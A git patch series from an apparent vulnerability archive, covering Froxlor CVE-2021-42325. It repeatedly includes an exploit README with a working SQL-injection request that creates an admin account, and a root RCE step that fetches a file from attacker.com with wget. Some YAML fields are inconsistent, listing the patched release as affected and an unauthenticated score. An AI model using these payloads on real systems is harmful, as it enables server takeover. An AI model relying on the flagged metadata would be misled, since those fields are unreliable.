 - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782
 - https://www.exploit-db.com/exploits/50502
 classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 8.8
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
 cve-id: CVE-2021-42325
 edb-id: 50502
- cwe-id: None
+ cwe-id: CWE-89
 cnvd-id: None
 kve-id: None
 tags: exploit, remote, code execution, sql injection
\ No newline at end of file
From 7d12eb33e0178fe0fe9b369e24f7a8c2d87452f5 Mon Sep 17 00:00:00 2001
From: wangyue
Date: Sun, 9 Apr 2023 03:54:41 +0000
Subject: [PATCH 045/109] update cve/Froxlor/2023/yaml/CVE-2021-42325.yaml.
Signed-off-by: wangyue
---
 cve/Froxlor/2023/yaml/CVE-2021-42325.yaml | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml
index c266bcd9..f7274053 100644
--- a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml
+++ b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml
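Review bot: The new `cvss-metrics` line changes Privileges Required from `PR:L` to `PR:N` and the score from 8.8 to 9.8, but the README for this CVE elsewhere in the series titles the issue "SQL Injection (Authenticated)" and lists "Access to a customer account" as a pre-requisite, which is exactly the `PR:L` case. If the vector was copied from an external scoring source, name that source next to the field; otherwise `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` and `cvss-score: 8.8` are the values this repository's own write-up supports. `severity: 高危` also no longer matches a 9.8 score, which falls in the Critical (9.0–10.0) band of the CVSS v3.1 qualitative scale, so one of the two fields should move. The same `PR:N`/`9.8` pair is copied into the new `cve/Froxlor/2021/yaml/CVE-2021-42325.yaml` later in this series.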
@@ -8,7 +8,7 @@ info:
 Froxlor是Froxlor团队的一套轻量级服务器管理软件。
 Froxlor存在安全漏洞,该漏洞允许在数据库管理器DbManagerMySQL.php中通过自定义数据库名称注入SQL。
 scope-of-influence:
- Froxlor 0.10.2l9.1
+ Froxlor 0.9~0.10.30
 reference:
 - https://nvd.nist.gov/vuln/detail/CVE-2021-42325
 - https://avd.aliyun.com/detail?id=AVD-2021-42325
@@ -19,7 +19,6 @@ info:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
 cvss-score: 9.8
 cve-id: CVE-2021-42325
- edb-id: 50502
 cwe-id: CWE-89
 cnvd-id: None
 kve-id: None
From c15f7e209a026d958e6eb7344ece71e9e8631fdf Mon Sep 17 00:00:00 2001
From: wangyue
Date: Sun, 9 Apr 2023 04:00:43 +0000
Subject: [PATCH 046/109] =?UTF-8?q?update=20openkylin=5Flist.yaml.=20=20Fr?=
 =?UTF-8?q?oxlor=E5=B7=B2=E5=90=88=E5=B9=B6?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: wangyue
---
 openkylin_list.yaml | 4 +---
 1 file changed, 1 insertion(+), 3 deletions(-)
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index f6e78d03..52d07ef1 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -42,9 +42,6 @@ cve:
 - CVE-2019-0230
 Influx-DB:
 - CVE-2019-20933
- Froxlor:
- - CVE-2023-0315
- - CVE-2021-42325
 linux-kernel:
 - CVE-2021-4204
 - CVE-2021-29155
@@ -169,6 +166,7 @@ cve:
 Grafana:
 - CVE-2021-43798
 Froxlor:
+ - CVE-2021-42325
 - CVE-2023-0315
 cnvd:
 apache-tomcat:
From 3c5693cd85a9a6234f4e497478961f6af435fad5 Mon Sep 17 00:00:00 2001
From: wangyue
Date: Mon, 10 Apr 2023 01:48:19 +0000
Subject: [PATCH 047/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202023?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/Froxlor/2023/2023/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/Froxlor/2023/2023/.keep
diff --git a/cve/Froxlor/2023/2023/.keep b/cve/Froxlor/2023/2023/.keep
new file mode 100644
index 00000000..e69de29b
From 56c2d8e62ee325d85de8b2f8913d8a0a6729c377 Mon Sep 17 00:00:00 2001
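Review bot: `scope-of-influence: Froxlor 0.9~0.10.30` names 0.10.30 as affected, yet the README in this series records 0.10.30 as the patched version ("Patched Version: 0.10.30", "2021-11-05 Fix release rolled out") and says the injectable feature only exists from 0.10.28 onward, so both ends of the range disagree with the repository's own write-up. An inclusive range should stop at the last vulnerable release, e.g. `Froxlor 0.10.28~0.10.29.1`, or be written as an open bound such as `Froxlor < 0.10.30`; the same range is repeated in the new `cve/Froxlor/2021/yaml/CVE-2021-42325.yaml` later in the series. In the second hunk `edb-id: 50502` is removed while the `reference` list still links https://www.exploit-db.com/exploits/50502; if the field is being dropped from the schema that is fine, but otherwise it looks like an accidental loss of a usable cross-reference.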
From: wangyue Date: Mon, 10 Apr 2023 01:48:27 +0000 Subject: [PATCH 048/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/Froxlor/2023/2023/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2023/2023/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Froxlor/2023/2023/.keep diff --git a/cve/Froxlor/2023/2023/.keep b/cve/Froxlor/2023/2023/.keep deleted file mode 100644 index e69de29b..00000000 From 665b3fba6d757bbf8d92366a6616e50f86fb9595 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:49:11 +0000 Subject: [PATCH 049/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202021?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Froxlor/2021/.keep diff --git a/cve/Froxlor/2021/.keep b/cve/Froxlor/2021/.keep new file mode 100644 index 00000000..e69de29b From 738f14b0d6affc02132addd5e9de19e765145a53 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:50:27 +0000 Subject: [PATCH 050/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-42325?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/CVE-2021-42325/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Froxlor/2021/CVE-2021-42325/.keep diff --git a/cve/Froxlor/2021/CVE-2021-42325/.keep b/cve/Froxlor/2021/CVE-2021-42325/.keep new file mode 100644 index 00000000..e69de29b From 8a02e73a035dcd14a81b711f9bd2eff197c29895 Mon Sep 17 00:00:00 2001 
From: wangyue Date: Mon, 10 Apr 2023 01:50:34 +0000 Subject: [PATCH 051/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/Froxlor/2021/CVE-2021-42325/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/CVE-2021-42325/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Froxlor/2021/CVE-2021-42325/.keep diff --git a/cve/Froxlor/2021/CVE-2021-42325/.keep b/cve/Froxlor/2021/CVE-2021-42325/.keep deleted file mode 100644 index e69de29b..00000000 From 9ff1b571886ceb2c21fb54e81d13065075227e8c Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:51:28 +0000 Subject: [PATCH 052/109] add cve/Froxlor/2021/README.md. Signed-off-by: wangyue --- cve/Froxlor/2021/README.md | 89 ++++++++++++++++++++++++++++++++++++++ 1 file changed, 89 insertions(+) create mode 100644 cve/Froxlor/2021/README.md diff --git a/cve/Froxlor/2021/README.md b/cve/Froxlor/2021/README.md new file mode 100644 index 00000000..3a4391d3 --- /dev/null +++ b/cve/Froxlor/2021/README.md 
@@ -0,0 +1,89 @@ +- Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) +- Exploit Author: Martin Cernac +- Date: 2021-11-05 +- Vendor: Froxlor (https://froxlor.org/) +- Software Link: https://froxlor.org/download.php +- Affected Version: 0.10.28, 0.10.29, 0.10.29.1 +- Patched Version: 0.10.30 +- Category: Web Application +- Tested on: Ubuntu +- CVE: 2021-42325 + + +### 1. Technical Description: +Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. + +#### 1.1 Pre-requisites + - Access to a customer account + - Ability to specify database name when creating a database + - Feature only availible from 0.10.28 onward and must be manually enabled + +### 2. Proof Of Concept (PoC): + +The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root +# +#### 2.1 Privilege Escalation + + - Sign into Froxlor as a customer + - View your databases + - Create a database + - Put your payload into the "User/Database name" field (if enabled) + - Application will error out however your SQL query will be executed + The following is a POST request example of running the payload provided, resulting in an administrator account being created + + +``` +POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 +Host: localhost +Content-Type: application/x-www-form-urlencoded +Content-Length: 448 
+s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 + +``` + + +#### 2.2 Remote Code Execution + + To achieve RCE as root: + + - Sign into Froxlor as the newly created admin account (payload example creds are x:a) + - Go to System Settings + - Go to Webserver settings + - Adjust "Webserver reload command" field to a custom command + - The command must not contain any of the following special characters: ;|&><`$~? + - For details, see "safe_exec" function in lib/Froxlor/FileDir.php + - For example commands see Payloads 4.2 section + - Trigger configuration file rebuild + - Use menu item "Rebuild config files" + - Await a root cron job to execute your command + +### 3. Vulnerable resources and parameters + /customer_mysql.php (POST field: custom_suffix) + + +### 4. Payloads + +#### 4.1 SQL Injection payload + The following payload creates a new Froxlor admin with full access to all customers and the server configuration + The credentials are: + - username: x + - password: a + + `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- + + +#### 4.2 Remote Code Execution payload + Two part payload: + - wget http://attacker.com/malicious.txt -O /runme.php + - php /runme.php + +### 5. Timeline + 2021-10-11 Discovery + 2021-10-11 Contact with developer + 2021-10-11 Patch issued but no release rolled out + 2021-10-12 Reserved CVE-2021-42325 + 2021-11-05 Fix release rolled out + 2021-11-07 Public disclosure + +### 6. 
References: + https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file From 6af918b21555980eaa15e866f6826839e0622746 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:51:41 +0000 Subject: [PATCH 053/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/Froxlor/2021/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Froxlor/2021/.keep diff --git a/cve/Froxlor/2021/.keep b/cve/Froxlor/2021/.keep deleted file mode 100644 index e69de29b..00000000 From c118d55c7257a92f187717dfa5c466c2a369b951 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:52:17 +0000 Subject: [PATCH 054/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-42325?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/CVE-2021-42325/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Froxlor/2021/CVE-2021-42325/.keep diff --git a/cve/Froxlor/2021/CVE-2021-42325/.keep b/cve/Froxlor/2021/CVE-2021-42325/.keep new file mode 100644 index 00000000..e69de29b From 659ade8b9a5ff2fed0d7bcab24a77e129566f602 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:52:44 +0000 Subject: [PATCH 055/109] add cve/Froxlor/2021/CVE-2021-42325/README.md. Signed-off-by: wangyue --- cve/Froxlor/2021/CVE-2021-42325/README.md | 89 +++++++++++++++++++++++ 1 file changed, 89 insertions(+) create mode 100644 cve/Froxlor/2021/CVE-2021-42325/README.md diff --git a/cve/Froxlor/2021/CVE-2021-42325/README.md b/cve/Froxlor/2021/CVE-2021-42325/README.md new file mode 100644 index 00000000..3a4391d3 --- /dev/null +++ b/cve/Froxlor/2021/CVE-2021-42325/README.md 
@@ -0,0 +1,89 @@ +- Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) +- Exploit Author: Martin Cernac +- Date: 2021-11-05 +- Vendor: Froxlor (https://froxlor.org/) +- Software Link: https://froxlor.org/download.php +- Affected Version: 0.10.28, 0.10.29, 0.10.29.1 +- Patched Version: 0.10.30 +- Category: Web Application +- Tested on: Ubuntu +- CVE: 2021-42325 + + +### 1. Technical Description: +Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. + +#### 1.1 Pre-requisites + - Access to a customer account + - Ability to specify database name when creating a database + - Feature only availible from 0.10.28 onward and must be manually enabled + +### 2. Proof Of Concept (PoC): + +The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root +# +#### 2.1 Privilege Escalation + + - Sign into Froxlor as a customer + - View your databases + - Create a database + - Put your payload into the "User/Database name" field (if enabled) + - Application will error out however your SQL query will be executed + The following is a POST request example of running the payload provided, resulting in an administrator account being created + + +``` +POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 +Host: localhost +Content-Type: application/x-www-form-urlencoded +Content-Length: 448 
+s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 + +``` + + +#### 2.2 Remote Code Execution + + To achieve RCE as root: + + - Sign into Froxlor as the newly created admin account (payload example creds are x:a) + - Go to System Settings + - Go to Webserver settings + - Adjust "Webserver reload command" field to a custom command + - The command must not contain any of the following special characters: ;|&><`$~? + - For details, see "safe_exec" function in lib/Froxlor/FileDir.php + - For example commands see Payloads 4.2 section + - Trigger configuration file rebuild + - Use menu item "Rebuild config files" + - Await a root cron job to execute your command + +### 3. Vulnerable resources and parameters + /customer_mysql.php (POST field: custom_suffix) + + +### 4. Payloads + +#### 4.1 SQL Injection payload + The following payload creates a new Froxlor admin with full access to all customers and the server configuration + The credentials are: + - username: x + - password: a + + `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- + + +#### 4.2 Remote Code Execution payload + Two part payload: + - wget http://attacker.com/malicious.txt -O /runme.php + - php /runme.php + +### 5. Timeline + 2021-10-11 Discovery + 2021-10-11 Contact with developer + 2021-10-11 Patch issued but no release rolled out + 2021-10-12 Reserved CVE-2021-42325 + 2021-11-05 Fix release rolled out + 2021-11-07 Public disclosure + +### 6. 
References: + https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file From d04981ce94c09e2f8eaef8c00712e7dddcd0dc30 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:52:55 +0000 Subject: [PATCH 056/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/Froxlor/2021/README.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/README.md | 89 -------------------------------------- 1 file changed, 89 deletions(-) delete mode 100644 cve/Froxlor/2021/README.md diff --git a/cve/Froxlor/2021/README.md b/cve/Froxlor/2021/README.md deleted file mode 100644 index 3a4391d3..00000000 --- a/cve/Froxlor/2021/README.md +++ /dev/null 
@@ -1,89 +0,0 @@ -- Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) -- Exploit Author: Martin Cernac -- Date: 2021-11-05 -- Vendor: Froxlor (https://froxlor.org/) -- Software Link: https://froxlor.org/download.php -- Affected Version: 0.10.28, 0.10.29, 0.10.29.1 -- Patched Version: 0.10.30 -- Category: Web Application -- Tested on: Ubuntu -- CVE: 2021-42325 - - -### 1. Technical Description: -Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. - -#### 1.1 Pre-requisites - - Access to a customer account - - Ability to specify database name when creating a database - - Feature only availible from 0.10.28 onward and must be manually enabled - -### 2. Proof Of Concept (PoC): - -The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root -# -#### 2.1 Privilege Escalation - - - Sign into Froxlor as a customer - - View your databases - - Create a database - - Put your payload into the "User/Database name" field (if enabled) - - Application will error out however your SQL query will be executed - The following is a POST request example of running the payload provided, resulting in an administrator account being created - - -``` -POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 -Host: localhost -Content-Type: application/x-www-form-urlencoded -Content-Length: 448 
-s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 - -``` - - -#### 2.2 Remote Code Execution - - To achieve RCE as root: - - - Sign into Froxlor as the newly created admin account (payload example creds are x:a) - - Go to System Settings - - Go to Webserver settings - - Adjust "Webserver reload command" field to a custom command - - The command must not contain any of the following special characters: ;|&><`$~? - - For details, see "safe_exec" function in lib/Froxlor/FileDir.php - - For example commands see Payloads 4.2 section - - Trigger configuration file rebuild - - Use menu item "Rebuild config files" - - Await a root cron job to execute your command - -### 3. Vulnerable resources and parameters - /customer_mysql.php (POST field: custom_suffix) - - -### 4. Payloads - -#### 4.1 SQL Injection payload - The following payload creates a new Froxlor admin with full access to all customers and the server configuration - The credentials are: - - username: x - - password: a - - `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- - - -#### 4.2 Remote Code Execution payload - Two part payload: - - wget http://attacker.com/malicious.txt -O /runme.php - - php /runme.php - -### 5. Timeline - 2021-10-11 Discovery - 2021-10-11 Contact with developer - 2021-10-11 Patch issued but no release rolled out - 2021-10-12 Reserved CVE-2021-42325 - 2021-11-05 Fix release rolled out - 2021-11-07 Public disclosure - -### 6. 
References: - https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file From 38a60650529a959d073402cb6155d6fd425dfd10 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:53:13 +0000 Subject: [PATCH 057/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Froxlor/2021/yaml/.keep diff --git a/cve/Froxlor/2021/yaml/.keep b/cve/Froxlor/2021/yaml/.keep new file mode 100644 index 00000000..e69de29b From 3e3f1b8fcbf94254d26c46ab167d5ec8755a488e Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 02:03:03 +0000 Subject: [PATCH 058/109] add cve/Froxlor/2021/yaml/CVE-2021-42325.yaml. Signed-off-by: wangyue --- cve/Froxlor/2021/yaml/CVE-2021-42325.yaml | 25 +++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cve/Froxlor/2021/yaml/CVE-2021-42325.yaml diff --git a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml new file mode 100644 index 00000000..f39d1ec1 --- /dev/null +++ b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml 
@@ -0,0 +1,25 @@
+id: CVE-2021-42325
+source:
+ https://github.com/Froxlor/Froxlor/releases/tag/0.10.30
+info:
+ name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。
+ severity: high
+ description:
+ Froxlor是Froxlor团队的一套轻量级服务器管理软件。
+ Froxlor存在安全漏洞,该漏洞允许在数据库管理器DbManagerMySQL.php中通过自定义数据库名称注入SQL。
+ scope-of-influence:
+ Froxlor 0.9~0.10.30
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-42325
+ - https://avd.aliyun.com/detail?id=AVD-2021-42325
+ - http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html
+ - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782
+ - https://www.exploit-db.com/exploits/50502
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-42325
+ cwe-id: CWE-89
+ cnvd-id: None
+ kve-id: None
+ tags: exploit, remote, code execution, sql injection
\ No newline at end of file From eb63db617d9aae2c0bf07cf67ba6a29a2af07c9b Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 02:03:28 +0000 Subject: [PATCH 059/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/Froxlor/2023/CVE-2021-42325?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2023/CVE-2021-42325/README.md | 89 ----------------------- 1 file changed, 89 deletions(-) delete mode 100644 cve/Froxlor/2023/CVE-2021-42325/README.md
diff --git a/cve/Froxlor/2023/CVE-2021-42325/README.md b/cve/Froxlor/2023/CVE-2021-42325/README.md
deleted file mode 100644
index c1b38e2e..00000000
--- a/cve/Froxlor/2023/CVE-2021-42325/README.md
+++ /dev/null
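Review bot: `scope-of-influence: Froxlor 0.9~0.10.30` lists the fixed release as affected — the README on this page gives 0.10.28, 0.10.29 and 0.10.29.1 as affected and 0.10.30 as patched, and the `source` field itself points at the 0.10.30 release tag, so anything keyed on this range would flag already-patched hosts; change it to `Froxlor 0.10.28~0.10.29.1` (or whatever range the referenced advisory states). The `description:` key has lost the `|` block indicator that the earlier copy of this file (deleted two patches later) carries, so its two lines are folded into one plain scalar; restore `description: |` if consumers rely on the line structure. `severity: high` also sits next to `cvss-score: 9.8`, which CVSS v3.1 rates critical; keep the two consistent.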
@@ -1,89 +0,0 @@ -- Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) -- Exploit Author: Martin Cernac -- Date: 2021-11-05 -- Vendor: Froxlor (https://froxlor.org/) -- Software Link: https://froxlor.org/download.php -- Affected Version: 0.10.28, 0.10.29, 0.10.29.1 -- Patched Version: 0.10.30 -- Category: Web Application -- Tested on: Ubuntu -- CVE: 2021-42325 - - -### 1. Technical Description: -Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. - -#### 1.1 Pre-requisites - - Access to a customer account - - Ability to specify database name when creating a database - - Feature only availible from 0.10.28 onward and must be manually enabled - -### 2. Proof Of Concept (PoC): - -The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root -# -#### 2.1 Privilege Escalation - - - Sign into Froxlor as a customer - - View your databases - - Create a database - - Put your payload into the "User/Database name" field (if enabled) - - Application will error out however your SQL query will be executed - The following is a POST request example of running the payload provided, resulting in an administrator account being created - - -``` -POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 -Host: localhost -Content-Type: application/x-www-form-urlencoded -Content-Length: 448 
-s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 - -``` - - -#### 2.2 Remote Code Execution - - To achieve RCE as root: - - - Sign into Froxlor as the newly created admin account (payload example creds are x:a) - - Go to System Settings - - Go to Webserver settings - - Adjust "Webserver reload command" field to a custom command - - The command must not contain any of the following special characters: ;|&><`$~? - - For details, see "safe_exec" function in lib/Froxlor/FileDir.php - - For example commands see Payloads 4.2 section - - Trigger configuration file rebuild - - Use menu item "Rebuild config files" - - Await a root cron job to execute your command - -### 3. Vulnerable resources and parameters - /customer_mysql.php (POST field: custom_suffix) - - -### 4. Payloads - -#### 4.1 SQL Injection payload - The following payload creates a new Froxlor admin with full access to all customers and the server configuration - The credentials are: - - username: x - - password: a - - `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- - - -#### 4.2 Remote Code Execution payload - Two part payload: - - wget http://attacker.com/malicious.txt -O /runme.php - - php /runme.php - -### 5. Timeline - 2021-10-11 Discovery - 2021-10-11 Contact with developer - 2021-10-11 Patch issued but no release rolled out - 2021-10-12 Reserved CVE-2021-42325 - 2021-11-05 Fix release rolled out - 2021-11-07 Public disclosure - -### 6. 
References: - https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file From f7ae36f2ba53a9a183b5a790ee73ea626607616b Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 02:03:44 +0000 Subject: [PATCH 060/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/Froxlor/2023/yaml/CVE-2021-42325.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2023/yaml/CVE-2021-42325.yaml | 25 ----------------------- 1 file changed, 25 deletions(-) delete mode 100644 cve/Froxlor/2023/yaml/CVE-2021-42325.yaml diff --git a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml deleted file mode 100644 index f7274053..00000000 --- a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: CVE-2021-42325 -source: - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 -info: - name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 - severity: 高危 - description: | - Froxlor是Froxlor团队的一套轻量级服务器管理软件。 - Froxlor存在安全漏洞,该漏洞允许在数据库管理器DbManagerMySQL.php中通过自定义数据库名称注入SQL。 - scope-of-influence: - Froxlor 0.9~0.10.30 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-42325 - - https://avd.aliyun.com/detail?id=AVD-2021-42325 - - http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html - - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 